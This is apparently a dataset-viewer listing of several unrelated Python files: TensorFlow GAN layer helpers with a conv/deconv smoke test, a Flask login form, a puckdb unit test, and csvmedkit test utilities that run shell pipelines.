        shape = [size, 1, 1, dimension]
        initializer = tf.truncated_normal_initializer(stddev=stddev)
        return tf.get_variable("E", shape=shape, dtype=tf.float32,
                               initializer=initializer)
def merge(image, size):
    """Tile a batch of images into one grid image.

    Parameters
    ----------
    image : ndarray of shape (batch, height, width, channels)
    size : (rows, cols) grid layout; rows * cols should cover the batch.

    Returns
    -------
    ndarray of shape (rows * height, cols * width, channels).
    """
    # Per-image dimensions come from the batch array's *shape* — the
    # original read image[1], image[2], image[3], which are whole images.
    height, width, channel = image.shape[1], image.shape[2], image.shape[3]
    # np.zeros takes a single shape tuple; the original passed three
    # positional args, making `width` the dtype (TypeError).
    img = np.zeros((height * size[0], width * size[1], channel))
    for idx, single in enumerate(image):
        # Row-major placement: walk columns first, then rows.
        col = idx % size[1]
        row = idx // size[1]
        img[row * height:(row + 1) * height, col * width:(col + 1) * width, :] = single
    return img
def image_norm(image):
    """Scale 8-bit pixel values from [0, 255] into [-1, 1]."""
    # Bug fix: the original computed `normalized` but returned the raw
    # input, making the function a no-op.
    return (image / 127.5) - 1
#def dense_batch_norm(x, number_out, phase_train, name='bn'): #BN necessary?
#beta = tf.get_variable(name + '/fc_beta', shape=[number_out], initializer=tf.constant_initializer(0.0))
#gamma = tf.get_variable(name + 'fc_gamma', shape=[number_out], initializer=tf.random_normal_initializer(mean=1.0, stddev=0.02))
#batch_mean, batch_var = tf.nn.moments(x, [0], name=name + '/fc_moments')
#ema = tf.train.ExponentialMovingAverage(decay=0.9)
#def mean_var_update():
# ema_apply_op = ema.apply([batch_mean, batch_var])
# with tf.control_dependencies(ema_apply_op):
# return tf.identity(batch_mean), tf.identity(batch_var)
#mean ,var = tf.cond(name=phase_train, mean_var_update, lambda: (ema.average(batch_mean), ema.average(batch_var)))
#normed = tf.nn.batch_normalization(x, mean, var, beta, gamma, 1e-5)
#return normed
#def global_batch_norm(x, number_out, phase_train, name='bn'): #BN necessary?
#beta = tf.get_variable(name + '/beta', shape=[number_out], initializer=tf.constant_initializer(0.0))
#gamma = tf.get_variable(name + '/gamma', shape=[number_out], initializer=tf.random_normal_initializer(mean=1.0, stddev=0.02))
#batch_mean, batch_var = tf.nn.moments(x, [0, 1, 2], name=name + '/moments')
#ema = tf.train.ExponentialMovingAverage(decay=0.9)
#def mean_var_update():
# ema_apply_op = ema.apply([batch_mean, batch_var])
# with tf.control_dependencies(ema_apply_op):
# return tf.identity(batch_mean), tf.identity(batch_var)
#mean, var = tf.cond(name=phase_train, mean_var_update, lambda: (ema.average(batch_mean), ema.average(batch_var)))
#normed = tf.nn.batch_normalization(x, mean, var, beta, gamma, 1e-5)
#return normed
def mini_batch_dis(x, num_kernels=100, dim_kernel=5, init=False, name='MD'): #decrease mode loss
    # Minibatch discrimination (Salimans et al., "Improved Techniques for
    # Training GANs"): augments each sample's features with statistics of its
    # L1 distances to the other samples in the batch, so the discriminator
    # can detect mode collapse.
    # NOTE(review): relies on module-level globals `df_dim` and `batch_size`;
    # the `init` parameter is never used.
    num_inputs = df_dim*4
    theta = tf.get_variable(name+'/theta', [num_inputs, num_kernels, dim_kernel], initializer=tf.random_normal_initializer(stddev=0.05))
    log_weight_scale = tf.get_variable(name+'/lws', [num_kernels, dim_kernel], initializer=tf.constant_initializer(0.0))
    # Scale theta by exp(log_weight_scale), normalised over the input axis.
    W = tf.matmul(theta, tf.expand_dims(tf.exp(log_weight_scale)/tf.sqrt(tf.reduce_sum(tf.square(theta),0)), 0))
    W = tf.reshape(W,[-1, num_kernels*dim_kernel])
    x = tf.reshape(x, [batch_size, num_inputs])
    ac = tf.reshape(tf.matmul(x, W), [-1, num_kernels, dim_kernel])
    # Pairwise L1 distances between samples; (1 - eye(batch_size)) masks out
    # each sample's distance to itself.
    # NOTE(review): tf.sub was removed in TF 1.x (renamed tf.subtract) —
    # confirm against the TF version this repo pins.
    diff = tf.matmul(tf.reduce_sum(tf.abs(tf.sub(tf.expand_dims(ac, 3), tf.expand_dims(tf.transpose(ac, [1, 2, 0]),0))), 2),
                1-tf.expand_dims(tf.constant(np.eye(batch_size), dtype=np.float32), 1))
    # NOTE(review): `out` is computed but never used; the usual formulation
    # concatenates `out` (not raw `diff`) onto x — verify intent.
    out = tf.reduce_sum(tf.exp(-diff),2) / tf.reduce_sum(tf.exp(-diff))
    return tf.concat([x, diff], 1)
def conv2d(x, output_filters, kh=5, kw=5, sh=2, sw=2, stddev=0.02, scope="conv2d"):
    """Strided 2-D convolution (SAME padding) with a learned bias."""
    with tf.variable_scope(scope):
        in_channels = x.get_shape().as_list()[-1]
        W = tf.get_variable('W', [kh, kw, in_channels, output_filters],
                            initializer=tf.truncated_normal_initializer(stddev=stddev))
        b = tf.get_variable('b', [output_filters], initializer=tf.constant_initializer(0.0))
        activation = tf.nn.conv2d(x, W, strides=[1, sh, sw, 1], padding='SAME')
        # Reshape restores the statically known shape after bias_add.
        return tf.reshape(tf.nn.bias_add(activation, b), activation.get_shape())
def deconv2d(x, output_shape, kh=5, kw=5, sh=2, sw=2, stddev=0.02, scope="deconv2d"):
    """Transposed 2-D convolution producing ``output_shape``, with a bias."""
    with tf.variable_scope(scope):
        in_channels = x.get_shape().as_list()[-1]
        w = tf.get_variable('w', [kh, kw, output_shape[-1], in_channels],
                            initializer=tf.truncated_normal_initializer(stddev=stddev))
        b = tf.get_variable('b', [output_shape[-1]], initializer=tf.constant_initializer(0.0))
        upsampled = tf.nn.conv2d_transpose(x, w, output_shape=output_shape, strides=[1, sh, sw, 1])
        # Reshape restores the statically known shape after bias_add.
        return tf.reshape(tf.nn.bias_add(upsampled, b), upsampled.get_shape())
def batch_norm(x, is_training, epsilon=1e-5, decay=0.9, scope="batch_norm"):
    """Batch normalisation wrapper (re-definition; shadows the earlier
    batch_norm defined above in this module)."""
    normalized = tf.contrib.layers.batch_norm(
        x, decay=decay, updates_collections=None, epsilon=epsilon,
        scale=True, is_training=is_training, scope=scope)
    return normalized
#----------------------unit-test for conv&deconv
# Manual smoke test: load one PNG, resize to 256x256, then push it through
# eight stride-2 conv layers (encoder) and eight deconv layers (decoder);
# the expected shape after each layer is annotated on its line.
reader = tf.WholeFileReader()
directory = tf.train.string_input_producer(['/home/linkwong/Zeroshot-GAN/model/image.png'])
key, value = reader.read(directory)
image_tensor = tf.image.decode_png(value)
# NOTE(review): this initializer is created before the conv/deconv variables
# below exist, so those variables are not covered by it — confirm intended.
initialize = tf.global_variables_initializer()
generator_dim = 64
discriminator_dim = 64
output_width = 256
with tf.Session() as sess:
    sess.run(initialize)
    # Queue runners feed the filename queue created above.
    coord = tf.train.Coordinator()
    threads = tf.train.start_queue_runners(coord=coord)
    for i in range(1):
        image = image_tensor.eval()
    image = tf.image.resize_images(image, [256, 256]) #resize the image into 256*256
    print(image.shape)
    image_ten = tf.convert_to_tensor(image, tf.float32) #convert the image into tensor
    print(image_ten.shape)
    coord.request_stop()
    coord.join(threads)
# Add the batch dimension expected by conv2d.
image_ten = tf.expand_dims(image_ten, 0) #(1, 256, 256, 3)
# Encoder: spatial resolution halves at every layer, 256 -> 1.
image_conv_1 = conv2d(image_ten, generator_dim, scope="conv_1") #(1, 128, 128, 64)
image_conv_2 = conv2d(image_conv_1, generator_dim*2, scope="conv_2")#(1, 64, 64, 128)
image_conv_3 = conv2d(image_conv_2, generator_dim*4, scope="conv_3")#(1, 32, 32, 256)
image_conv_4 = conv2d(image_conv_3, generator_dim*8, scope="conv_4")#(1, 16, 16, 512)
image_conv_5 = conv2d(image_conv_4, generator_dim*8, scope="conv_5")#(1, 8, 8, 512)
image_conv_6 = conv2d(image_conv_5, generator_dim*8, scope="conv_6")#(1, 4, 4, 512)
image_conv_7 = conv2d(image_conv_6, generator_dim*8, scope="conv_7")#(1, 2, 2, 512)
image_conv_8 = conv2d(image_conv_7, generator_dim*8, scope="conv_8")#(1, 1, 1, 512)
#print(image_conv_8.shape)
# Decoder: mirror of the encoder, upsampling back to 256x256x3.
image_deconv_8 = deconv2d(image_conv_8, [1, 2, 2, generator_dim*8], scope="deconv_8")#(1, 2, 2, 512)
image_deconv_7 = deconv2d(image_deconv_8, [1, 4, 4, generator_dim*8], scope="deconv_7")#(1, 4, 4, 512)
image_deconv_6 = deconv2d(image_deconv_7, [1, 8, 8, generator_dim*8], scope="deconv_6")#(1, 8, 8, 512)
image_deconv_5 = deconv2d(image_deconv_6, [1, 16, 16, generator_dim*8], scope="deconv_5")#(1, 16, 16, 512)
image_deconv_4 = deconv2d(image_deconv_5, [1, 32, 32, generator_dim*4], scope="deconv_4")#(1, 32, 32, 256)
image_deconv_3 = deconv2d(image_deconv_4, [1, 64, 64, generator_dim*2], scope="deconv_3")#(1, 64, 64, 128)
image_deconv_2 = deconv2d(image_deconv_3, [1, 128, 128, generator_dim], scope="deconv_2")#(1, 128, 128, 64)
image_deconv_1 = deconv2d(image_deconv_2, [1, 256, 256, 3], scope="deconv_1")
#print(image_deconv_1.shape)
|
nilq/baby-python
|
python
|
from flask_wtf import FlaskForm
from wtforms.validators import DataRequired, Length, Email, EqualTo, ValidationError
from wtforms import TextField, TextAreaField, SubmitField, validators, ValidationError,StringField, PasswordField, SubmitField, BooleanField
class LoginForm(FlaskForm):
    """Email/password login form."""
    # Both fields are required; the email field additionally validates format.
    email = StringField('Email', validators=[DataRequired(), Email()])
    password = PasswordField('Password', validators=[DataRequired()])
    submit = SubmitField('Login')
|
nilq/baby-python
|
python
|
#
# Copyright (c) 2020 Carsten Igel.
#
# This file is part of puckdb
# (see https://github.com/carstencodes/puckdb).
#
# License: 3-clause BSD, see https://opensource.org/licenses/BSD-3-Clause
#
import unittest
import tempfile
import os
import time
import puckdb
class BasicTest(unittest.TestCase):
    """Smoke test: a value written through one PuckDB handle is readable
    through a second handle opened on the same file."""

    def test_no_crash(self):
        with tempfile.TemporaryDirectory() as tmp_dir:
            db_path: str = os.path.join(str(tmp_dir), "test.db")
            writer = puckdb.PuckDB(db_path, True, False)
            writer.set("test", 1)
            # Give the background worker time to flush the write.
            time.sleep(2)
            reader = puckdb.PuckDB(db_path, False, False)
            fetched = reader.get("test")
            print(reader.getall())
            self.assertEqual(fetched, 1)
if __name__ == "__main__":
    # Allow running this test module directly with `python <file>.py`.
    unittest.main()
|
nilq/baby-python
|
python
|
#!/usr/bin/env python
"""
Inherits the stuff from tests.csvk – i.e. csvkit.tests.utils
"""
from tests.csvk import *
from tests.csvk import CSVKitTestCase as BaseCsvkitTestCase
import unittest
from unittest.mock import patch
from unittest import skip as skiptest
from unittest import TestCase
import warnings
from io import StringIO
from parameterized import parameterized
from subprocess import Popen, PIPE # soon to be deprecated
from subprocess import check_output as sub_check_output
import sys
from typing import List as ListType, Optional as OptionalType
from csvmedkit import agate
from csvmedkit.exceptions import *
warnings.filterwarnings("ignore", category=DeprecationWarning)
class CmkTestCase(BaseCsvkitTestCase):
    """Base test case layering shell-command and pipeline helpers over
    csvkit's CSVKitTestCase."""
    def cmd_output(self, command: str) -> str:
        """Run *command* through the shell and return its stdout decoded as UTF-8."""
        output = sub_check_output(command, shell=True, stderr=sys.stderr)
        return output.decode("utf-8")
    def assertCmdLines(self, command: str, rows, newline_at_eof=True):
        """Assert that *command*'s stdout equals *rows*, line by line.

        NOTE(review): mutates the caller's ``rows`` list when
        ``newline_at_eof`` is true (appends "").
        """
        lines = self.cmd_output(command).split("\n")
        if newline_at_eof:
            # A trailing newline yields one final empty element after
            # split("\n"); account for it.
            rows.append("")
        for i, row in enumerate(rows):
            self.assertEqual(lines[i], row)
        self.assertEqual(len(lines), len(rows))
    # TODO: probably will deprecate pipe_output and assertPipedLines for being too
    # clunky for my tastes
    def pipe_output(self, commands: ListType[str]) -> OptionalType[str]:
        """
        Chain *commands* as a shell-style pipeline and return the final stdout.

        each command is a list of strings, representing a command and argument, e.g.
        ['head', '-n', '5', 'examples/dummy.csv'],
        ['csvflatten', '-P'],
        """
        output = None  # StringIO()
        cmdcount = len(commands)
        pipes = []
        # Spawn every stage except the last, wiring each stdout to the
        # next stage's stdin.
        for i, cmd in enumerate(commands, 1):
            if i == 1:
                p = Popen(cmd, stdout=PIPE)
            elif i == cmdcount:
                pass  # manually instantiate last command with context manager
            else:
                p = Popen(cmd, stdin=pipes[-1].stdout, stdout=PIPE)
            # NOTE(review): on the final iteration `p` still refers to the
            # previous stage, so that Popen gets appended twice; the
            # wait/close loop below tolerates the duplicate.
            pipes.append(p)
        with Popen(commands[-1], stdin=pipes[-1].stdout, stdout=PIPE) as foo:
            output = foo.communicate()[0].decode("utf-8")
            foo.kill()
        # pipes[0].stdout.close()
        for p in pipes:
            p.wait()
            p.stdout.close()
            # p.kill()
        return output
    def pipe_output_as_list(self, commands) -> ListType[str]:
        """Like pipe_output, but split the result into lines."""
        return self.pipe_output(commands).split("\n")
    def assertPipedLines(self, commands, rows, newline_at_eof=True):
        """Assert the pipeline built from *commands* outputs *rows*.

        NOTE(review): mutates the caller's ``rows`` list when
        ``newline_at_eof`` is true (appends "").
        """
        lines = self.pipe_output_as_list(commands)
        if newline_at_eof:
            rows.append("")
        for i, row in enumerate(rows):
            self.assertEqual(lines[i], row)
        self.assertEqual(len(lines), len(rows))
|
nilq/baby-python
|
python
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.